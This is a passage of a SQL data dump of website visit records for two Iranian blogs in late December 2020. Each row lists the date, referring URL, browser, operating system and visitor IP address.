(7402,'2020-12-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.118.7','000',0,1,0),
(7403,'2020-12-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.119.5','000',0,1,0),
(7404,'2020-12-23','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(7405,'2020-12-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(7406,'2020-12-23','http://ictbank.ir/blog','Android Browser','Android','6.0',NULL,NULL,'','113.31.115.156','000',0,1,0),
(7407,'2020-12-23','http://design-arena.ir/blog','Chrome','OS X','10.12.6',NULL,NULL,'','168.119.123.101','000',0,1,0),
(7408,'2020-12-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.167.6.182','000',0,1,0),
(7409,'2020-12-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(7410,'2020-12-23','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.235.75.160','000',0,1,0),
(7411,'2020-12-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.36.143.150','000',0,1,0),
(7412,'2020-12-23','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','185.191.204.6','000',0,9,0),
(7413,'2020-12-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.155.122','000',0,1,0),
(7414,'2020-12-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(7415,'2020-12-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(7416,'2020-12-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','34.125.231.36','000',0,3,0),
(7417,'2020-12-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(7418,'2020-12-23','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','92.237.245.60','000',0,1,0),
(7419,'2020-12-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(7420,'2020-12-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(7421,'2020-12-24','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','5.188.62.140','000',0,1,0),
(7422,'2020-12-24','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','5.188.62.214','000',0,1,0),
(7423,'2020-12-24','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.228.0.155','000',0,1,0),
(7424,'2020-12-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.192.227','000',0,1,0),
(7425,'2020-12-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(7426,'2020-12-24','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.19.213.178','000',0,1,0),
(7427,'2020-12-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.112.192.97','000',0,1,0),
(7428,'2020-12-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7429,'2020-12-24','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','35.223.145.37','000',0,3,0),
(7430,'2020-12-24','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','173.255.227.31','000',0,1,0),
(7431,'2020-12-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.253.218.243','000',0,1,0),
(7432,'2020-12-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(7433,'2020-12-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(7434,'2020-12-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.155.122','000',0,1,0),
(7435,'2020-12-24','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.90.42','000',0,10,0),
(7436,'2020-12-24','http://www.ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','167.114.175.39','000',0,2,0),
(7437,'2020-12-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.70.143.137','000',0,10,0),
(7438,'2020-12-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(7439,'2020-12-25','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.175.42','000',0,1,0),
(7440,'2020-12-25','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.207.132.206','000',0,1,0),
(7441,'2020-12-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.247.239','000',0,1,0),
(7442,'2020-12-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','44.242.169.28','000',0,1,0),
(7443,'2020-12-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.147.205','000',0,1,0),
(7444,'2020-12-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(7445,'2020-12-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.155.122','000',0,1,0),
(7446,'2020-12-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.189.12.97','000',0,1,0),
(7447,'2020-12-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.252.146.112','000',0,1,0),
(7448,'2020-12-25','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','181.54.228.71','000',0,1,0),
(7449,'2020-12-25','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.171.186','000',0,1,0),
(7450,'2020-12-25','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(7451,'2020-12-25','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','201.208.29.217','000',0,1,0),
(7452,'2020-12-26','http://ictbank.ir/blog/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','Chrome','Windows','10.0',NULL,NULL,'','62.210.207.209','000',0,6,0),
(7453,'2020-12-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,7,0),
(7454,'2020-12-26','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','51.195.166.160','000',0,1,0),
(7455,'2020-12-26','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.102.144.121','000',0,2,0),
(7456,'2020-12-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','168.119.123.150','000',0,1,0),
(7457,'2020-12-26','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','185.132.214.20','000',0,3,0),
(7458,'2020-12-26','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','167.114.175.39','000',0,10,0),
(7459,'2020-12-26','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','36.32.3.81','000',0,1,0),
(7460,'2020-12-26','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','62.102.148.68','000',0,1,0),
(7461,'2020-12-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.207.69','000',0,1,0),
(7462,'2020-12-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7463,'2020-12-26','http://ictbank.ir/blog','Firefox','Windows','6.2',NULL,NULL,'','178.49.232.141','000',0,2,0),
(7464,'2020-12-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','34.214.51.38','000',0,1,0),
(7465,'2020-12-26','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.232.23.20','000',0,2,0),
(7466,'2020-12-26','http://ictbank.ir/blog','Android Browser','Android','9',NULL,NULL,'','89.35.29.95','000',0,2,0),
(7467,'2020-12-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(7468,'2020-12-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','54.81.2.172','000',0,2,0),
(7469,'2020-12-26','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','134.19.189.236','000',0,2,0),
(7470,'2020-12-26','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.214','000',0,1,0),
(7471,'2020-12-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','193.168.147.155','000',0,1,0),
(7472,'2020-12-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(7473,'2020-12-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(7474,'2020-12-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','196.240.57.172','000',0,2,0),
(7475,'2020-12-26','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','179.158.150.227','000',0,2,0),
(7476,'2020-12-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.155.122','000',0,1,0),
(7477,'2020-12-26','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','82.102.27.212','000',0,2,0),
(7478,'2020-12-27','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','18.203.253.63','000',0,1,0),
(7479,'2020-12-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(7480,'2020-12-27','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','123.207.31.240','000',0,3,0),
(7481,'2020-12-27','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','51.15.154.64','000',0,2,0),
(7482,'2020-12-27','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','178.49.232.141','000',0,2,0),
(7483,'2020-12-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.198.87.44','000',0,1,0),
(7484,'2020-12-27','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','192.240.226.141','000',0,1,0),
(7485,'2020-12-27','http://ictbank.ir/blog','UC Browser','Android','6.0',NULL,NULL,'','185.176.221.96','000',0,2,0),
(7486,'2020-12-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.90.29.81','000',0,1,0),
(7487,'2020-12-27','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','37.120.201.180','000',0,2,0),
(7488,'2020-12-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','44.238.183.142','000',0,1,0),
(7489,'2020-12-27','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','18.218.155.14','000',0,1,0),
(7490,'2020-12-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','217.146.82.202','000',0,2,0),
(7491,'2020-12-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','8.210.103.35','000',0,2,0),
(7492,'2020-12-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.27.49.246','000',0,1,0),
(7493,'2020-12-27','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','84.17.46.203','000',0,1,0),
(7494,'2020-12-27','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.238.129.253','000',0,1,0),
(7495,'2020-12-27','http://ictbank.ir/blog','UC Browser','Android','6.0',NULL,NULL,'','143.244.56.152','000',0,2,0),
(7496,'2020-12-27','http://ictbank.ir/blog','Internet Explorer','Windows','4.1',NULL,NULL,'','37.120.203.204','000',0,2,0),
(7497,'2020-12-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.39.124','000',0,1,0),
(7498,'2020-12-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(7499,'2020-12-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','136.27.62.24','000',0,1,0),
(7500,'2020-12-27','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','84.17.42.114','000',0,2,0),
(7501,'2020-12-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','65.60.11.210','000',0,1,0),
(7502,'2020-12-27','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','14.215.46.142','000',0,2,0),
(7503,'2020-12-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','216.158.226.153','000',0,1,0),
(7504,'2020-12-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.147.205','000',0,1,0),
(7505,'2020-12-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(7506,'2020-12-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.218.52.156','000',0,1,0),
(7507,'2020-12-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(7508,'2020-12-27','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','1.54.117.126','000',0,2,0),
(7509,'2020-12-27','http://ictbank.ir/blog','UC Browser','Android','5.0',NULL,NULL,'','194.35.233.64','000',0,2,0),
(7510,'2020-12-27','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','45.89.174.124','000',0,2,0),
(7511,'2020-12-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','119.39.46.149','000',0,1,0),
(7512,'2020-12-28','http://ictbank.ir/blog','Android Browser','Android','7.1.2',NULL,NULL,'','51.15.152.109','000',0,2,0),
(7513,'2020-12-28','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','34.83.5.210','000',0,2,0),
(7514,'2020-12-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','34.105.95.179','000',0,1,0),
(7515,'2020-12-28','http://ictbank.ir/blog','Instagram','Android','6.0.1',NULL,NULL,'','195.181.170.200','000',0,2,0),
(7516,'2020-12-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7517,'2020-12-28','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','5.188.62.147','000',0,1,0),
(7518,'2020-12-28','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','5.209.66.165','000',0,1,0),
(7519,'2020-12-28','http://ictbank.ir/blog','Opera Mobile','Android','5.0.2',NULL,NULL,'','82.102.21.57','000',0,2,0),
(7520,'2020-12-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(7521,'2020-12-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.32.158','000',0,1,0),
(7522,'2020-12-28','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','194.33.45.231','000',0,1,0),
(7523,'2020-12-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.58.135','000',0,1,0),
(7524,'2020-12-28','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.238.85.97','000',0,1,0),
(7525,'2020-12-28','http://ictbank.ir/blog','Yandex Browser','Windows','5.1',NULL,NULL,'','213.232.87.100','000',0,2,0),
(7526,'2020-12-28','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','117.50.137.13','000',0,2,0),
(7527,'2020-12-28','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','217.138.192.100','000',0,2,0),
(7528,'2020-12-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','141.98.10.217','000',0,1,0),
(7529,'2020-12-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.147.205','000',0,1,0),
(7530,'2020-12-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(7531,'2020-12-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.120.204.52','000',0,2,0),
(7532,'2020-12-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.159.37.34','000',0,8,0),
(7533,'2020-12-28','http://ictbank.ir/blog','Facebook','Android','6.0.1',NULL,NULL,'','109.202.111.211','000',0,2,0),
(7534,'2020-12-28','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','37.169.50.184','000',0,2,0),
(7535,'2020-12-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.55.146','000',0,1,0),
(7536,'2020-12-28','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','46.101.80.192','000',0,1,0),
(7537,'2020-12-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.146.34','000',0,1,0),
(7538,'2020-12-29','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','165.231.33.204','000',0,2,0),
(7539,'2020-12-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(7540,'2020-12-29','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','217.138.192.100','000',0,2,0),
(7541,'2020-12-29','http://ictbank.ir/blog','Facebook','Android','7.1.1',NULL,NULL,'','84.17.62.195','000',0,2,0),
(7542,'2020-12-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','47.242.157.243','000',0,2,0),
(7543,'2020-12-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','45.91.22.136','000',0,2,0),
(7544,'2020-12-29','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','46.45.137.236','000',0,1,0),
(7545,'2020-12-29','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','195.154.47.149','000',0,2,0),
(7546,'2020-12-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.200.193.106','000',0,1,0),
(7547,'2020-12-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','172.68.102.159','000',0,2,0),
(7548,'2020-12-29','http://ictbank.ir/blog','Internet Explorer','Windows','5.0',NULL,NULL,'','196.240.57.52','000',0,2,0),
(7549,'2020-12-29','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','185.109.168.132','000',0,2,0),
(7550,'2020-12-29','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.188.174.194','000',0,2,0),
(7551,'2020-12-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.158.166','000',0,1,0),
(7552,'2020-12-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(7553,'2020-12-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.48.30','000',0,1,0),
(7554,'2020-12-29','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','201.102.198.212','000',0,2,0),
(7555,'2020-12-29','http://ictbank.ir/blog','UC Browser','Android','6.0',NULL,NULL,'','134.19.189.164','000',0,2,0),
(7556,'2020-12-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.250','000',0,1,0),
(7557,'2020-12-29','http://design-arena.ir','Chrome','Windows','10.0',NULL,NULL,'','45.87.249.80','000',0,1,0),
(7558,'2020-12-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','206.72.198.54','000',0,1,0),
(7559,'2020-12-29','http://ictbank.ir/blog','Unknown','Android','5.1',NULL,NULL,'','195.206.107.118','000',0,2,0),
(7560,'2020-12-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(7561,'2020-12-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(7562,'2020-12-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,2,0),
(7563,'2020-12-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(7564,'2020-12-29','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','37.120.209.164','000',0,2,0),
(7565,'2020-12-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7566,'2020-12-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.124.218','000',0,1,0),
(7567,'2020-12-29','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(7568,'2020-12-29','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','141.98.103.188','000',0,2,0),
(7569,'2020-12-30','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','185.236.42.21','000',0,2,0),
(7570,'2020-12-30','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','195.181.170.200','000',0,2,0),
(7571,'2020-12-30','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','89.248.167.193','000',0,1,0),
(7572,'2020-12-30','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','71.172.148.192','000',0,1,0),
(7573,'2020-12-30','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','95.174.67.196','000',0,2,0),
(7574,'2020-12-30','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','36.90.182.132','000',0,2,0),
(7575,'2020-12-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(7576,'2020-12-30','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','195.154.47.149','000',0,2,0),
(7577,'2020-12-30','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.204.46.154','000',0,14,0),
(7578,'2020-12-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.112.213.42','000',0,1,0),
(7579,'2020-12-30','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','84.17.36.156','000',0,2,0),
(7580,'2020-12-30','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','202.78.232.138','000',0,3,0),
(7581,'2020-12-30','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','6.1',NULL,NULL,'','80.79.116.140','000',0,2,0),
(7582,'2020-12-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.132.179','000',0,1,0),
(7584,'2020-12-30','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','35.175.223.240','000',0,1,0),
(7585,'2020-12-30','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','45.152.183.4','000',0,2,0),
(7586,'2020-12-30','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','136.144.184.61','000',0,4,0),
(7587,'2020-12-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','95.217.8.152','000',0,1,0),
(7588,'2020-12-30','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','116.202.35.85','000',0,1,0),
(7589,'2020-12-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','35.230.68.20','000',0,1,0),
(7590,'2020-12-30','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','35.230.68.20','000',0,2,0),
(7591,'2020-12-30','http://ictbank.ir/blog','Chrome','Android','8.1.0',NULL,NULL,'','31.204.150.60','000',0,9,0),
(7592,'2020-12-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','34.76.19.107','000',0,1,0),
(7593,'2020-12-30','https://t.co/M882OgbHAg?amp=1','Chrome','Windows','6.1',NULL,NULL,'','69.58.103.6','000',0,1,0),
(7594,'2020-12-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(7595,'2020-12-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(7596,'2020-12-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(7597,'2020-12-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(7598,'2020-12-30','http://ictbank.ir/blog','Android Browser','Android','4.4.4',NULL,NULL,'','185.216.33.14','000',0,2,0),
(7599,'2020-12-30','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','188.235.1.85','000',0,1,0),
(7600,'2020-12-30','http://82.102.9.14/blog','Safari','OS X','10.11.2',NULL,NULL,'','2.57.122.9','000',0,1,0),
(7601,'2020-12-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.248.170.194','000',0,14,0),
(7602,'2020-12-30','http://ictbank.ir/blog','Facebook Messenger','Android','7.0',NULL,NULL,'','178.239.173.180','000',0,2,0),
(7603,'2020-12-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.155.122','000',0,1,0),
(7604,'2020-12-31','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','220.160.73.231','000',0,3,0),
(7605,'2020-12-31','http://ictbank.ir/blog','Facebook','iOS','12.3.1',NULL,NULL,'','37.120.203.204','000',0,2,0),
(7606,'2020-12-31','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','178.159.37.34','000',0,1,0),
(7607,'2020-12-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(7608,'2020-12-31','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','202.84.37.55','000',0,2,0),
(7609,'2020-12-31','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','89.248.167.133','000',0,1,0),
(7610,'2020-12-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.154','000',0,1,0),
(7611,'2020-12-31','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','77.74.197.196','000',0,4,0),
(7612,'2020-12-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','80.94.93.150','000',0,1,0),
(7613,'2020-12-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.43.229.88','000',0,1,0),
(7614,'2020-12-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(7615,'2020-12-31','http://ictbank.ir/blog','Yandex Browser','Windows','5.1',NULL,NULL,'','89.33.246.20','000',0,2,0),
(7616,'2020-12-31','http://ictbank.ir/blog','Unknown','Android','5.1',NULL,NULL,'','37.120.197.60','000',0,2,0),
(7617,'2020-12-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.212.166.186','000',0,1,0),
(7618,'2020-12-31','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.239.118.52','000',0,2,0),
(7619,'2020-12-31','http://ictbank.ir/blog','Chrome','Android','5.1.1',NULL,NULL,'','151.234.98.152','000',0,1,0),
(7620,'2020-12-31','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','47.242.16.129','000',0,2,0),
(7621,'2020-12-31','http://ictbank.ir/blog','Opera','Windows','6.2',NULL,NULL,'','37.120.149.164','000',0,2,0),
(7622,'2020-12-31','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(7623,'2020-12-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,2,0),
(7624,'2020-12-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(7625,'2020-12-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(7626,'2020-12-31','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','191.209.81.11','000',0,2,0),
(7627,'2020-12-31','http://ictbank.ir/blog','Chrome','Android','4.3',NULL,NULL,'','212.83.136.152','000',0,2,0),
(7628,'2020-12-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.155.122','000',0,1,0),
